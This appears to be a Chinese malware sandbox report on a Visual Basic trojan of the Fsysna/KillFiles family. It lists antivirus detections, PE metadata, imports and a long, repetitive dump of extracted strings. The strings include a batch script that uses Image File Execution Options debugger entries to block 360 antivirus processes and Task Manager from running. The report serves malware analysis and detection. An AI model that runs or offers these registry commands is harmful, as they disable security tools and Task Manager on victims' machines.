1.1
低危
64 个模型检测该样本为恶意!
重新分析
更多

26e9bbbb8315799bf39923f379f5521951dabe7a60a9f08cda29a1f0379fe191

26e9bbbb8315799bf39923f379f5521951dabe7a60a9f08cda29a1f0379fe191.exe

分析耗时

196s

最近分析

356天前

文件大小

209.6KB
静态报毒 动态报毒 CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN FSYSNA
鹰眼引擎
DACN 0.12
FACILE 1.00
IMCLNet 0.69
MFGraph 0.00
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Worm:Win32/Fsysna.75db97d3 20190527 0.3.0.5
Avast Win32:Malware-gen 20200212 18.4.3895.0
Baidu None 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Kingsoft None 20200212 2013.8.14.323
McAfee Trojan-FQXU!032D33525E3E 20200212 6.0.6.653
Tencent Malware.Win32.Gencirc.10b3cff1 20200212 1.0.0.1
静态指标
行为判定
动态指标
在 PE 资源中识别到外语 (1 个事件)
name RT_VERSION language LANG_CHINESE filetype None sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0000a9a4 size 0x0000024c
网络通信
与未执行 DNS 查询的主机进行通信 (1 个事件)
host 114.114.114.114
文件已被 VirusTotal 上 64 个反病毒引擎识别为恶意 (50 out of 64 个事件)
ALYac Trojan.Agent.DVQW
APEX Malicious
AVG Win32:Malware-gen
Acronis suspicious
Ad-Aware Trojan.Agent.DVQW
AhnLab-V3 Trojan/Win32.Fsysna.R269415
Alibaba Worm:Win32/Fsysna.75db97d3
Antiy-AVL Trojan/Win32.Fsysna.FCCR
Arcabit Trojan.Agent.DVQW
Avast Win32:Malware-gen
Avira TR/Dropper.Gen
BitDefender Trojan.Agent.DVQW
BitDefenderTheta AI:Packer.6CEA3C871F
Bkav W32.HfsOval.
CAT-QuickHeal Trojan.FsysnaVMF.S7094755
ClamAV Win.Malware.Fsysna-7004456-0
Comodo TrojWare.Win32.Ditertag.DI@8k2up6
CrowdStrike win/malicious_confidence_100% (W)
Cybereason malicious.25e3e3
Cylance Unsafe
Cyren W32/Fsysna.E.gen!Eldorado
DrWeb Trojan.KillFiles.64121
ESET-NOD32 Win32/KillFiles.A
Emsisoft Trojan.Agent.DVQW (B)
Endgame malicious (high confidence)
F-Prot W32/Fsysna.E.gen!Eldorado
F-Secure Trojan.TR/Dropper.Gen
FireEye Generic.mg.032d33525e3e3fad
Fortinet W32/Fsysna.FCCR!tr
GData Trojan.Agent.DVQW
Invincea heuristic
Jiangmin Trojan.Fsysna.kfk
K7AntiVirus Trojan ( 0000bbc81 )
K7GW Trojan ( 0000bbc81 )
Kaspersky Trojan.Win32.Fsysna.fcpq
Lionic Trojan.Win32.Fsysna.tpPg
MAX malware (ai score=80)
Malwarebytes Hijack.AssocExt
MaxSecure Trojan.Fsysna.fcpq
McAfee Trojan-FQXU!032D33525E3E
McAfee-GW-Edition BehavesLike.Win32.SuspiciousDel.dm
MicroWorld-eScan Trojan.Agent.DVQW
Microsoft Trojan:Win32/Musecador
NANO-Antivirus Trojan.Win32.Fsysna.fpivmo
Paloalto generic.ml
Panda Trj/Genetic.gen
Qihoo-360 Win32/Harm.XiaoHao.F
Rising Worm.KillFile!1.B91B (CLOUD)
SUPERAntiSpyware Trojan.Agent/Gen-Injector
Sangfor Malware
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2019-04-20 18:22:04

PE Imphash

d2bf2bc66c5e49a85254cd29b19046bd

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00007df0 0x00008000 6.058616924670466
.data 0x00009000 0x00000b40 0x00001000 0.0
.rsrc 0x0000a000 0x00001000 0x00001000 4.416328167746471

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0000a0e8 0x000008a8 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_GROUP_ICON 0x0000a990 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_VERSION 0x0000a9a4 0x0000024c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED None

Imports

Library MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaStrI4
0x40100c __vbaVarMove
0x401010 __vbaAryMove
0x401014 __vbaFreeVar
0x401018 __vbaStrVarMove
0x40101c __vbaLenBstr
0x401020 __vbaFreeVarList
0x401024 __vbaEnd
0x401028 _adj_fdiv_m64
0x40102c __vbaFreeObjList
0x401030 _adj_fprem1
0x401034 __vbaStrCat
0x401038 __vbaError
0x40103c __vbaSetSystemError
0x401044 _adj_fdiv_m32
0x401048 __vbaAryDestruct
0x40104c __vbaExitProc
0x401050 __vbaVarForInit
0x401054 None
0x401058 None
0x40105c __vbaObjSet
0x401060 __vbaOnError
0x401064 _adj_fdiv_m16i
0x401068 _adj_fdivr_m16i
0x40106c None
0x401070 _CIsin
0x401074 __vbaErase
0x401078 __vbaChkstk
0x40107c __vbaGosubFree
0x401080 __vbaFileClose
0x401084 EVENT_SINK_AddRef
0x40108c None
0x401090 __vbaAryConstruct2
0x401094 __vbaPutOwner4
0x401098 __vbaI2I4
0x40109c DllFunctionCall
0x4010a0 __vbaFpUI1
0x4010a4 __vbaRedimPreserve
0x4010a8 __vbaStrR4
0x4010ac _adj_fpatan
0x4010b4 None
0x4010b8 __vbaRedim
0x4010bc EVENT_SINK_Release
0x4010c0 __vbaNew
0x4010c4 None
0x4010c8 __vbaUI1I2
0x4010cc _CIsqrt
0x4010d4 __vbaUI1I4
0x4010d8 __vbaExceptHandler
0x4010dc __vbaPrintFile
0x4010e0 __vbaStrToUnicode
0x4010e4 None
0x4010e8 _adj_fprem
0x4010ec _adj_fdivr_m64
0x4010f0 __vbaGosub
0x4010f4 None
0x4010f8 __vbaFPException
0x4010fc None
0x401100 __vbaGetOwner3
0x401104 __vbaStrVarVal
0x401108 __vbaVarCat
0x40110c __vbaGetOwner4
0x401110 __vbaI2Var
0x401114 __vbaLsetFixstrFree
0x401118 None
0x40111c _CIlog
0x401120 __vbaErrorOverflow
0x401124 __vbaFileOpen
0x401128 __vbaVar2Vec
0x40112c __vbaNew2
0x401130 None
0x401134 None
0x401138 None
0x40113c _adj_fdiv_m32i
0x401140 _adj_fdivr_m32i
0x401144 None
0x401148 __vbaStrCopy
0x40114c __vbaVarSetObj
0x401150 __vbaFreeStrList
0x401154 __vbaDerefAry1
0x401158 _adj_fdivr_m32
0x40115c _adj_fdiv_r
0x401160 None
0x401164 None
0x401168 __vbaVarTstNe
0x40116c None
0x401170 __vbaI4Var
0x401174 __vbaVarAdd
0x401178 __vbaAryLock
0x40117c __vbaVarDup
0x401180 __vbaStrToAnsi
0x401188 __vbaFpI4
0x40118c __vbaVarCopy
0x401190 None
0x401198 _CIatan
0x40119c __vbaStrMove
0x4011a0 __vbaStrVarCopy
0x4011a4 _allmul
0x4011a8 __vbaLenVarB
0x4011ac _CItan
0x4011b0 __vbaAryUnlock
0x4011b4 __vbaFPInt
0x4011b8 __vbaVarForNext
0x4011bc _CIexp
0x4011c0 __vbaFreeStr
0x4011c4 __vbaFreeObj
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
49431AAD794634219A639C6C541A3D96
E8A7EA76E1854769DE340A9B8C435D05
78493ED5434848C66C6270A8C3C17E8F
96782471E1F42F0E5192DEF8D34ADF52
62A15B7205C4F5C57A85B0D3069C33A9
9FFC7CA89A523E8929336726D7773437
D3436C5275093FAF2564D1686B09A90D
E3338793698E1606AF47D324D912D726
EC9586D14581D3BBA0F9E75718021738
D82B5A5B70E0FDEB799FE2F9ACF76564
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
49431AAD794634219A639C6C541A3D96
E8A7EA76E1854769DE340A9B8C435D05
78493ED5434848C66C6270A8C3C17E8F
96782471E1F42F0E5192DEF8D34ADF52
62A15B7205C4F5C57A85B0D3069C33A9
9FFC7CA89A523E8929336726D7773437
D3436C5275093FAF2564D1686B09A90D
E3338793698E1606AF47D324D912D726
EC9586D14581D3BBA0F9E75718021738
F624FE817F1D2ACA80FF8A9AF214D178
464884A5BB67C85A9A64E636C1DB332F
0C6D6F783070152ABDA0C643E67D0EA8
CF810F2694B570866769FDCE86CEB720
D7BD3F529B1601250167970865600932
L!This program cannot be run in DOS mode.
